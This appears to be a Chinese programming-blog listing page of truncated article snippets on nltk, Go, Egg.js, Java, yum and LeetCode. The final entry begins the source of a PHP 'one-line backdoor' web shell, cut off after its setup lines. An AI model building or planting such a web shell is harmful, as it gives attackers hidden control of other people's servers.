1. 读邮件数据集文件,提取邮件本身与标签。 列表 numpy数组 2.邮件预处理 邮件分句 句子分词 大小写,标点符号,去掉过短的单词 词性还原:复数、时态、比较级 连接成字符串 2.1 传统方法来实现 2.2 nltk库的安装与使用 pip install nltk import nltk nl ...
分类:
其他好文 时间:
2020-05-16 19:09:13
阅读次数:
60
runtime.SetFinalizer func SetFinalizer(obj interface{}, finalizer interface{}) SetFinalizer sets the finalizer associated with obj to the provided fin ...
分类:
其他好文 时间:
2020-05-16 18:28:07
阅读次数:
131
添加模版引擎 npm i egg-view-ejs --save 2.找到 {app_root}/config/plugin.js exports.ejs = { enable: true, package: 'egg-view-ejs', }; 3.找到 {app_root}/config/con ...
分类:
其他好文 时间:
2020-05-16 14:04:41
阅读次数:
114
对应java代码:packagecom.yoooya.ytp.utils.doc;importcom.aspose.words.Document;importcom.aspose.words.License;importcom.aspose.words.SaveFormat;importcom.yoooya.ytp.utils.DateUtils;importcom.yoooya.ytp.util
分类:
编程语言 时间:
2020-05-16 10:46:26
阅读次数:
66
使用vsftp配置本地yum源 1、安装vsftp 使用vmware安装好CentOS 8.1 后,开机会自动挂载,此时进入挂载目录下的 AppStream/Packages 下,执行以下命令安装vsftp 修改配置文件 /etc/vsftpd/vsftpd.conf 的 为 否则下面的配置yum会 ...
分类:
其他好文 时间:
2020-05-16 00:26:33
阅读次数:
169
我的LeetCode:https://leetcode cn.com/u/ituring/ 我的LeetCode刷题源码[GitHub]:https://github.com/izhoujie/Algorithmcii LeetCode 面试题64. 求1+2+…+n 题目 求 1+2+...+n ...
分类:
其他好文 时间:
2020-05-16 00:12:43
阅读次数:
76
1 package test_13_2; 2 3 public class Outer { 4 5 private String str; 6 7 public Outer() { 8 9 } 10 11 public Outer(String str) { 12 13 this.str = str ...
分类:
编程语言 时间:
2020-05-15 22:56:38
阅读次数:
82
配置数据库环境,创建数据库和表 创建maven空项目,并添加web组件支持 导入pom依赖 <dependencies> <!--Junit--> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <versio ...
分类:
其他好文 时间:
2020-05-15 15:54:56
阅读次数:
87
在 Idea 安装 Alibaba Cloud Toolkit 插件 步骤: Prefererences Plugins Marketplace 搜索Alibaba Cloud Toolkit Install Restart Idea 创建简单项目 使用 Idea 创建 SpringBoot 项目: ...
分类:
编程语言 时间:
2020-05-15 15:26:29
阅读次数:
160
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:
Web程序 时间:
2020-05-15 13:23:16
阅读次数:
242